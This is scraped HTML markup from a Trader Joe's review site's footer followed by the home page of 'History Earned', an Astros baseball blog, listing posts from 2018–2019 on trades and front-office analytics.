Posts</h3> <ul> <li> <a href="http://www.traderjoesreviews.com/avengers-waffles/">Avengers Waffles Made with Trader Joe&#8217;s Ingredients!</a> </li> <li> <a href="http://www.traderjoesreviews.com/trader-joes-chicken-turkey-salad-recall/">Trader Joe&#8217;s Chicken &#038; Turkey Cranberry Salads Recall</a> </li> </ul> <div class="clear"></div></div> </div> <div class="clear"></div> </div> </footer> </div> </div> <script type="text/javascript"> jQuery(document).ready(function($) { $('body').bind('added_to_cart', function(){ $('.add_to_cart_button.added').text('Added'); $('.add_to_cart_button.added').parent().parent().siblings(".float-left").children(".star-rating").hide() }); $(".sidebar-title").click(function() { $(this).find(".collapsible").toggleClass("closed"); $(this).next(".sidebar-block").slideToggle(500); }); }); </script> <div class="revsliderstyles"><style type="text/css"></style> </div><script type='text/javascript' src='//www.traderjoesreviews.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.70'></script> <script type='text/javascript'> /* <![CDATA[ */ var woocommerce_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%"}; /* ]]> */ </script> <script type='text/javascript' src='//www.traderjoesreviews.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=2.6.11'></script> <script type='text/javascript' src='//www.traderjoesreviews.com/wp-content/plugins/woocommerce/assets/js/jquery-cookie/jquery.cookie.min.js?ver=1.4.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var wc_cart_fragments_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","fragment_name":"wc_fragments"}; /* ]]> */ </script> <script type='text/javascript' src='//www.traderjoesreviews.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=2.6.11'></script> <script type='text/javascript' src='http://www.traderjoesreviews.com/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4'></script> <script type='text/javascript' src='http://www.traderjoesreviews.com/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4'></script> <script type='text/javascript' src='http://www.traderjoesreviews.com/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4'></script> <script type='text/javascript' src='http://www.traderjoesreviews.com/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4'></script> <script type='text/javascript' src='http://www.traderjoesreviews.com/wp-includes/js/comment-reply.min.js?ver=37fbe8ade72fb6e60f14c0c9992cfe64'></script> <script type='text/javascript' src='http://www.traderjoesreviews.com/wp-content/themes/circolare/js/plugins.js?ver=1'></script> <script type='text/javascript' src='http://www.traderjoesreviews.com/wp-content/themes/circolare/js/caroufredsel.js?ver=1'></script> <script type='text/javascript' src='http://www.traderjoesreviews.com/wp-content/themes/circolare/js/custom.js?ver=1'></script> <script type='text/javascript' src='http://www.traderjoesreviews.com/wp-content/themes/circolare/flexi/flexslider.js?ver=1'></script> <script type='text/javascript' src='http://www.traderjoesreviews.com/wp-includes/js/wp-embed.min.js?ver=37fbe8ade72fb6e60f14c0c9992cfe64'></script> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-49525718-1', 'auto'); ga('send', 'pageview'); </script> </body> </html>
0
<!DOCTYPE html> <html lang="en-US"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="http://gmpg.org/xfn/11"> <title>History Earned: a blog about the Astros &#8211; For maybe the best Astros rambling on the interwebs</title> <script type="text/javascript"> WebFontConfig = {"google":{"families":["Merriweather+Sans:r:latin,latin-ext"]}}; (function() { var wf = document.createElement('script'); wf.src = 'https://history-earned.com/wp-content/mu-plugins/wpcomsh/vendor/automattic/custom-fonts/js/webfont.js'; wf.type = 'text/javascript'; wf.async = 'true'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(wf, s); })(); </script><style id="jetpack-custom-fonts-css">.wf-active h1{font-style:normal;font-weight:400}.wf-active #reply-title, .wf-active .comments-title, .wf-active .widget-title, .wf-active .widgettitle, .wf-active .widget-title label, .wf-active h1, .wf-active h2, .wf-active h3, .wf-active h4, .wf-active h5, .wf-active h6{font-family:"Merriweather Sans",sans-serif;font-style:normal;font-weight:400}.wf-active h1{font-weight:400;font-style:normal}.wf-active #reply-title, .wf-active .comments-title, .wf-active .widget-title, .wf-active .widgettitle, .wf-active .widget-title label, .wf-active h2{font-weight:400;font-style:normal}.wf-active h3{font-weight:400;font-style:normal}.wf-active h4{font-weight:400;font-style:normal}.wf-active h5{font-weight:400;font-style:normal}.wf-active h6{font-weight:400;font-style:normal}.wf-active .site-title{font-family:"Merriweather Sans",sans-serif;font-weight:400;font-style:normal}.wf-active .site-description{font-style:normal;font-weight:400}.wf-active .archive .entry-title, .wf-active .blog .entry-title, .wf-active .search .entry-title{font-family:"Merriweather Sans",sans-serif;font-weight:400;font-style:normal}.wf-active .archive .apostrophe-2-featured .entry-title, .wf-active .blog .apostrophe-2-featured .entry-title, .wf-active .search .apostrophe-2-featured .entry-title{font-style:normal;font-weight:400}.wf-active .widget-title, .wf-active .widgettitle, .wf-active .widget-title label{font-style:normal;font-weight:400}.wf-active h1{font-style:normal;font-weight:400}</style> <link rel='dns-prefetch' href='//s0.wp.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="History Earned: a blog about the Astros &raquo; Feed" href="https://history-earned.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="History Earned: a blog about the Astros &raquo; Comments Feed" href="https://history-earned.com/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/history-earned.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://c0.wp.com/c/5.2/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='wpcom-text-widget-styles-css' href='https://history-earned.com/wp-content/mu-plugins/wpcomsh/vendor/automattic/text-media-widget-styles/css/widget-text.css?ver=20170607' type='text/css' media='all' /> <link rel='stylesheet' id='mediaelement-css' href='https://c0.wp.com/c/5.2/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='wp-mediaelement-css' href='https://c0.wp.com/c/5.2/wp-includes/js/mediaelement/wp-mediaelement.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='apostrophe-2-blocks-css' href='https://history-earned.com/wp-content/themes/apostrophe-2/css/blocks.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='apostrophe-2-style-css' href='https://history-earned.com/wp-content/themes/apostrophe-2/style.css?ver=20140520' type='text/css' media='all' /> <link rel='stylesheet' id='genericons-css' href='https://c0.wp.com/p/jetpack/7.3.1/_inc/genericons/genericons/genericons.css' type='text/css' media='all' /> <link crossorigin="anonymous" rel='stylesheet' id='apostrophe-2-fonts-css' href='https://fonts.googleapis.com/css?family=PT+Serif%3A400%2C400italic%2C700%2C700italic%7COpen+Sans%3A300%2C300italic%2C400%2C400italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic&#038;subset=latin%2Clatin-ext%2Ccyrillic' type='text/css' media='all' /> <link rel='stylesheet' id='apostrophe-2-wpcom-css' href='https://history-earned.com/wp-content/themes/apostrophe-2/inc/style-wpcom.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='jetpack_css-css' href='https://c0.wp.com/p/jetpack/7.3.1/css/jetpack.css' type='text/css' media='all' /> <script type='text/javascript' src='https://c0.wp.com/c/5.2/wp-includes/js/jquery/jquery.js'></script> <script type='text/javascript' src='https://c0.wp.com/c/5.2/wp-includes/js/jquery/jquery-migrate.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/spin.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/jquery.spin.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/tiled-gallery/tiled-gallery/tiled-gallery.min.js'></script> <script type='text/javascript'> var mejsL10n = {"language":"en","strings":{"mejs.install-flash":"You are using a browser that does not have Flash player enabled or installed. Please turn on your Flash player plugin or download the latest version from https:\/\/get.adobe.com\/flashplayer\/","mejs.fullscreen-off":"Turn off Fullscreen","mejs.fullscreen-on":"Go Fullscreen","mejs.download-video":"Download Video","mejs.fullscreen":"Fullscreen","mejs.time-jump-forward":["Jump forward 1 second","Jump forward %1 seconds"],"mejs.loop":"Toggle Loop","mejs.play":"Play","mejs.pause":"Pause","mejs.close":"Close","mejs.time-slider":"Time Slider","mejs.time-help-text":"Use Left\/Right Arrow keys to advance one second, Up\/Down arrows to advance ten seconds.","mejs.time-skip-back":["Skip back 1 second","Skip back %1 seconds"],"mejs.captions-subtitles":"Captions\/Subtitles","mejs.captions-chapters":"Chapters","mejs.none":"None","mejs.mute-toggle":"Mute Toggle","mejs.volume-help-text":"Use Up\/Down Arrow keys to increase or decrease volume.","mejs.unmute":"Unmute","mejs.mute":"Mute","mejs.volume-slider":"Volume Slider","mejs.video-player":"Video Player","mejs.audio-player":"Audio Player","mejs.ad-skip":"Skip ad","mejs.ad-skip-info":["Skip in 1 second","Skip in %1 seconds"],"mejs.source-chooser":"Source Chooser","mejs.stop":"Stop","mejs.speed-rate":"Speed Rate","mejs.live-broadcast":"Live Broadcast","mejs.afrikaans":"Afrikaans","mejs.albanian":"Albanian","mejs.arabic":"Arabic","mejs.belarusian":"Belarusian","mejs.bulgarian":"Bulgarian","mejs.catalan":"Catalan","mejs.chinese":"Chinese","mejs.chinese-simplified":"Chinese (Simplified)","mejs.chinese-traditional":"Chinese (Traditional)","mejs.croatian":"Croatian","mejs.czech":"Czech","mejs.danish":"Danish","mejs.dutch":"Dutch","mejs.english":"English","mejs.estonian":"Estonian","mejs.filipino":"Filipino","mejs.finnish":"Finnish","mejs.french":"French","mejs.galician":"Galician","mejs.german":"German","mejs.greek":"Greek","mejs.haitian-creole":"Haitian Creole","mejs.hebrew":"Hebrew","mejs.hindi":"Hindi","mejs.hungarian":"Hungarian","mejs.icelandic":"Icelandic","mejs.indonesian":"Indonesian","mejs.irish":"Irish","mejs.italian":"Italian","mejs.japanese":"Japanese","mejs.korean":"Korean","mejs.latvian":"Latvian","mejs.lithuanian":"Lithuanian","mejs.macedonian":"Macedonian","mejs.malay":"Malay","mejs.maltese":"Maltese","mejs.norwegian":"Norwegian","mejs.persian":"Persian","mejs.polish":"Polish","mejs.portuguese":"Portuguese","mejs.romanian":"Romanian","mejs.russian":"Russian","mejs.serbian":"Serbian","mejs.slovak":"Slovak","mejs.slovenian":"Slovenian","mejs.spanish":"Spanish","mejs.swahili":"Swahili","mejs.swedish":"Swedish","mejs.tagalog":"Tagalog","mejs.thai":"Thai","mejs.turkish":"Turkish","mejs.ukrainian":"Ukrainian","mejs.vietnamese":"Vietnamese","mejs.welsh":"Welsh","mejs.yiddish":"Yiddish"}}; </script> <script type='text/javascript' src='https://c0.wp.com/c/5.2/wp-includes/js/mediaelement/mediaelement-and-player.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/c/5.2/wp-includes/js/mediaelement/mediaelement-migrate.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var _wpmejsSettings = {"pluginPath":"\/wp-includes\/js\/mediaelement\/","classPrefix":"mejs-","stretching":"responsive"}; /* ]]> */ </script> <link rel='https://api.w.org/' href='https://history-earned.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://history-earned.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://history-earned.com/wp-includes/wlwmanifest.xml" /> <link rel='shortlink' href='https://wp.me/9GUwN' /> <link rel='dns-prefetch' href='//widgets.wp.com'/> <link rel='dns-prefetch' href='//s0.wp.com'/> <link rel='dns-prefetch' href='//0.gravatar.com'/> <link rel='dns-prefetch' href='//1.gravatar.com'/> <link rel='dns-prefetch' href='//2.gravatar.com'/> <link rel='dns-prefetch' href='//i0.wp.com'/> <link rel='dns-prefetch' href='//i1.wp.com'/> <link rel='dns-prefetch' href='//i2.wp.com'/> <link rel='dns-prefetch' href='//c0.wp.com'/> <style type='text/css'>img#wpstats{display:none}</style><meta name="description" content="For maybe the best Astros rambling on the interwebs" /> <style type="text/css" id="apostrophe-2-header-css"> .site-branding { background: url('https://historyearned.files.wordpress.com/2018/02/cropped-banner9.jpg') center center; background-size: cover; min-height: 200px; padding: 3em; } .site-title, .site-description { clip: rect(1px, 1px, 1px, 1px); position: absolute; } .site-branding { text-align: center; } .site-logo { float: none; margin-top: 0; margin-bottom: 3.5px; } </style> <style type="text/css" id="custom-background-css"> body.custom-background { background-color: #002d62; } </style> <!-- Jetpack Open Graph Tags --> <meta property="og:type" content="website" /> <meta property="og:title" content="History Earned: a blog about the Astros" /> <meta property="og:description" content="For maybe the best Astros rambling on the interwebs" /> <meta property="og:url" content="https://history-earned.com/" /> <meta property="og:site_name" content="History Earned: a blog about the Astros" /> <meta property="og:image" content="https://i1.wp.com/history-earned.com/wp-content/uploads/2018/02/cropped-logo.png?fit=512%2C512&amp;ssl=1" /> <meta property="og:image:width" content="512" /> <meta property="og:image:height" content="512" /> <meta property="og:locale" content="en_US" /> <meta name="twitter:creator" content="@HistoryEarned" /> <meta name="twitter:site" content="@Ashitaka1110" /> <!-- End Jetpack Open Graph Tags --> <style type="text/css" id="custom-colors-css">.entry-meta a,.entry-meta span,.edit-link a,.comment-reply-link a,.entry-footer a[rel=tag] a,.entry-footer a[rel="category tag"] a,#infinite-handle span a,.widget-area .sidebar-primary aside .widgettitle,.widget-area .sidebar-primary aside .widget-title,.widget-area .sidebar-primary aside .widget-title label,.widget-area .sidebar-primary aside,.widget-area .sidebar-primary aside a{color:#fff}.widget-area .sidebar-primary aside.widget_goodreads a{color:#6d6d6d}.widget-area .sidebar-primary aside.jetpack_widget_social_icons ul a:hover{color:#fff}.sticky .entry-meta a,.sticky .entry-meta:before,.featured-content .entry-meta .posted-on a{color:#fff}body{background-color:#002d62}.infinite-container{background-color:#002d62}</style> <link rel="icon" href="https://i1.wp.com/history-earned.com/wp-content/uploads/2018/02/cropped-logo.png?fit=32%2C32&#038;ssl=1" sizes="32x32" /> <link rel="icon" href="https://i1.wp.com/history-earned.com/wp-content/uploads/2018/02/cropped-logo.png?fit=192%2C192&#038;ssl=1" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://i1.wp.com/history-earned.com/wp-content/uploads/2018/02/cropped-logo.png?fit=180%2C180&#038;ssl=1" /> <meta name="msapplication-TileImage" content="https://i1.wp.com/history-earned.com/wp-content/uploads/2018/02/cropped-logo.png?fit=270%2C270&#038;ssl=1" /> </head> <body class="home blog custom-background wp-embed-responsive custom-colors"> <div id="page" class="hfeed site"> <header id="masthead" class="site-header" role="banner"> <div class="site-branding"> <h1 class="site-title"><a href="https://history-earned.com/" rel="home">History Earned: a blog about the Astros</a></h1> <h2 class="site-description">For maybe the best Astros rambling on the interwebs</h2> </div> <nav id="site-navigation" class="main-navigation" role="navigation"> <a class="menu-toggle">Menu</a> <a class="skip-link screen-reader-text" href="#content">Skip to content</a> <div class="menu-primary-container"><ul id="menu-primary" class="apostrophe-2-navigation"><li id="menu-item-6" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-6"><a href="/" aria-current="page">Home</a></li> <li id="menu-item-18" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-18"><a href="https://history-earned.com/about/">About</a></li> <li id="menu-item-66" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-66"><a href="https://history-earned.com/category/greatest-hits/">Greatest Hits</a></li> <li id="menu-item-121" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-121"><a href="https://history-earned.com/category/nerdy/">Nerdy</a></li> <li id="menu-item-184" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-184"><a href="https://history-earned.com/category/transactions/">Transactions</a></li> <li id="menu-item-275" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-275"><a href="https://history-earned.com/category/player-profiles/">Player Profiles</a></li> <li id="menu-item-69" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-69"><a href="https://history-earned.com/category/podcast/">Podcast</a></li> <li id="menu-item-7" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-7"><a href="https://history-earned.com/contact/">Contact</a></li> </ul></div> <nav class="jetpack-social-navigation jetpack-social-navigation-svg" role="navigation" aria-label="Social Links Menu"> </nav><!-- .jetpack-social-navigation --> </nav><!-- #site-navigation --> </header><!-- #masthead --> <div id="content" class="site-content"> <section id="primary" class="content-area"> <main id="main" class="site-main" role="main"> <div id="posts-wrapper"> <article id="post-904" class="post-904 post type-post status-publish format-standard has-post-thumbnail hentry category-uncategorized"> <a class="entry-thumbnail apostrophe-2-thumb" href="https://history-earned.com/2019/03/14/behind-the-curtain-the-astros-front-offices-fearsome-reputation/"> <img width="450" height="440" src="https://i0.wp.com/history-earned.com/wp-content/uploads/2019/03/jeff.png?resize=450%2C440&amp;ssl=1" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" data-attachment-id="905" data-permalink="https://history-earned.com/2019/03/14/behind-the-curtain-the-astros-front-offices-fearsome-reputation/jeff/" data-orig-file="https://i0.wp.com/history-earned.com/wp-content/uploads/2019/03/jeff.png?fit=756%2C440&amp;ssl=1" data-orig-size="756,440" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="jeff" data-image-description="" data-medium-file="https://i0.wp.com/history-earned.com/wp-content/uploads/2019/03/jeff.png?fit=300%2C175&amp;ssl=1" data-large-file="https://i0.wp.com/history-earned.com/wp-content/uploads/2019/03/jeff.png?fit=723%2C421&amp;ssl=1" /> </a> <header class="entry-header"> <div class="entry-meta"> <span class="posted-on"><a href="https://history-earned.com/2019/03/14/behind-the-curtain-the-astros-front-offices-fearsome-reputation/" rel="bookmark"><time class="entry-date published updated" datetime="2019-03-14T17:58:59+00:00">March 14, 2019</time></a></span><span class="byline"> <span class="author vcard"><a class="url fn n" href="https://history-earned.com/author/crperry13/">Chris Perry</a></span></span> </div><!-- .entry-meta --> <h2 class="entry-title"><a href="https://history-earned.com/2019/03/14/behind-the-curtain-the-astros-front-offices-fearsome-reputation/" rel="bookmark">Behind the curtain: the Astros’ front office’s fearsome reputation</a></h2> </header><!-- .entry-header --> </article><!-- #post-## --> <article id="post-855" class="post-855 post type-post status-publish format-standard has-post-thumbnail hentry category-uncategorized"> <a class="entry-thumbnail apostrophe-2-thumb" href="https://history-earned.com/2019/01/20/analytics-are-good-for-player-contracts-not-bad-the-astros-proved-it/"> <img width="450" height="450" src="https://i0.wp.com/history-earned.com/wp-content/uploads/2019/01/McHugh.jpg?resize=450%2C450&amp;ssl=1" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" data-attachment-id="856" data-permalink="https://history-earned.com/2019/01/20/analytics-are-good-for-player-contracts-not-bad-the-astros-proved-it/mchugh/" data-orig-file="https://i0.wp.com/history-earned.com/wp-content/uploads/2019/01/McHugh.jpg?fit=749%2C526&amp;ssl=1" data-orig-size="749,526" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="McHugh" data-image-description="" data-medium-file="https://i0.wp.com/history-earned.com/wp-content/uploads/2019/01/McHugh.jpg?fit=300%2C211&amp;ssl=1" data-large-file="https://i0.wp.com/history-earned.com/wp-content/uploads/2019/01/McHugh.jpg?fit=723%2C508&amp;ssl=1" /> </a> <header class="entry-header"> <div class="entry-meta"> <span class="posted-on"><a href="https://history-earned.com/2019/01/20/analytics-are-good-for-player-contracts-not-bad-the-astros-proved-it/" rel="bookmark"><time class="entry-date published" datetime="2019-01-20T02:41:35+00:00">January 20, 2019</time><time class="updated" datetime="2019-01-20T02:43:26+00:00">January 20, 2019</time></a></span><span class="byline"> <span class="author vcard"><a class="url fn n" href="https://history-earned.com/author/crperry13/">Chris Perry</a></span></span> </div><!-- .entry-meta --> <h2 class="entry-title"><a href="https://history-earned.com/2019/01/20/analytics-are-good-for-player-contracts-not-bad-the-astros-proved-it/" rel="bookmark">Analytics are good for player contracts, not bad. The Astros proved it.</a></h2> </header><!-- .entry-header --> </article><!-- #post-## --> <article id="post-842" class="post-842 post type-post status-publish format-standard has-post-thumbnail hentry category-transactions category-uncategorized"> <a class="entry-thumbnail apostrophe-2-thumb" href="https://history-earned.com/2019/01/06/astros-send-j-d-davis-to-mets-in-exchange-for-prospects/"> <img width="450" height="397" src="https://i0.wp.com/history-earned.com/wp-content/uploads/2019/01/Davis.jpg?resize=450%2C397&amp;ssl=1" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" data-attachment-id="843" data-permalink="https://history-earned.com/2019/01/06/astros-send-j-d-davis-to-mets-in-exchange-for-prospects/davis/" data-orig-file="https://i0.wp.com/history-earned.com/wp-content/uploads/2019/01/Davis.jpg?fit=795%2C397&amp;ssl=1" data-orig-size="795,397" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="Davis" data-image-description="" data-medium-file="https://i0.wp.com/history-earned.com/wp-content/uploads/2019/01/Davis.jpg?fit=300%2C150&amp;ssl=1" data-large-file="https://i0.wp.com/history-earned.com/wp-content/uploads/2019/01/Davis.jpg?fit=723%2C361&amp;ssl=1" /> </a> <header class="entry-header"> <div class="entry-meta"> <span class="posted-on"><a href="https://history-earned.com/2019/01/06/astros-send-j-d-davis-to-mets-in-exchange-for-prospects/" rel="bookmark"><time class="entry-date published updated" datetime="2019-01-06T19:24:31+00:00">January 6, 2019</time></a></span><span class="byline"> <span class="author vcard"><a class="url fn n" href="https://history-earned.com/author/crperry13/">Chris Perry</a></span></span> </div><!-- .entry-meta --> <h2 class="entry-title"><a href="https://history-earned.com/2019/01/06/astros-send-j-d-davis-to-mets-in-exchange-for-prospects/" rel="bookmark">Astros send J.D. Davis to Mets in exchange for prospects</a></h2> </header><!-- .entry-header --> </article><!-- #post-## --> <article id="post-810" class="post-810 post type-post status-publish format-standard has-post-thumbnail hentry category-player-profiles category-transactions"> <a class="entry-thumbnail apostrophe-2-thumb" href="https://history-earned.com/2018/11/20/i-dont-want-nelson-cruz-for-the-astros-and-heres-why/"> <img width="450" height="410" src="https://i2.wp.com/history-earned.com/wp-content/uploads/2018/11/cruz.jpg?resize=450%2C410&amp;ssl=1" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" data-attachment-id="811" data-permalink="https://history-earned.com/2018/11/20/i-dont-want-nelson-cruz-for-the-astros-and-heres-why/cruz/" data-orig-file="https://i2.wp.com/history-earned.com/wp-content/uploads/2018/11/cruz.jpg?fit=848%2C410&amp;ssl=1" data-orig-size="848,410" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="cruz" data-image-description="" data-medium-file="https://i2.wp.com/history-earned.com/wp-content/uploads/2018/11/cruz.jpg?fit=300%2C145&amp;ssl=1" data-large-file="https://i2.wp.com/history-earned.com/wp-content/uploads/2018/11/cruz.jpg?fit=723%2C350&amp;ssl=1" /> </a> <header class="entry-header"> <div class="entry-meta"> <span class="posted-on"><a href="https://history-earned.com/2018/11/20/i-dont-want-nelson-cruz-for-the-astros-and-heres-why/" rel="bookmark"><time class="entry-date published updated" datetime="2018-11-20T22:04:02+00:00">November 20, 2018</time></a></span><span class="byline"> <span class="author vcard"><a class="url fn n" href="https://history-earned.com/author/crperry13/">Chris Perry</a></span></span> </div><!-- .entry-meta --> <h2 class="entry-title"><a href="https://history-earned.com/2018/11/20/i-dont-want-nelson-cruz-for-the-astros-and-heres-why/" rel="bookmark">I don&#8217;t want Nelson Cruz for the Astros, and here&#8217;s why</a></h2> </header><!-- .entry-header --> </article><!-- #post-## --> <article id="post-807" class="post-807 post type-post status-publish format-standard has-post-thumbnail hentry category-player-profiles category-transactions tag-paxton"> <a class="entry-thumbnail apostrophe-2-thumb" href="https://history-earned.com/2018/11/20/thoughts-on-the-james-paxton-trade-and-how-it-affects-the-astros/"> <img width="450" height="411" src="https://i1.wp.com/history-earned.com/wp-content/uploads/2018/11/pax.jpg?resize=450%2C411&amp;ssl=1" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" data-attachment-id="808" data-permalink="https://history-earned.com/2018/11/20/thoughts-on-the-james-paxton-trade-and-how-it-affects-the-astros/pax/" data-orig-file="https://i1.wp.com/history-earned.com/wp-content/uploads/2018/11/pax.jpg?fit=838%2C411&amp;ssl=1" data-orig-size="838,411" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="pax" data-image-description="" data-medium-file="https://i1.wp.com/history-earned.com/wp-content/uploads/2018/11/pax.jpg?fit=300%2C147&amp;ssl=1" 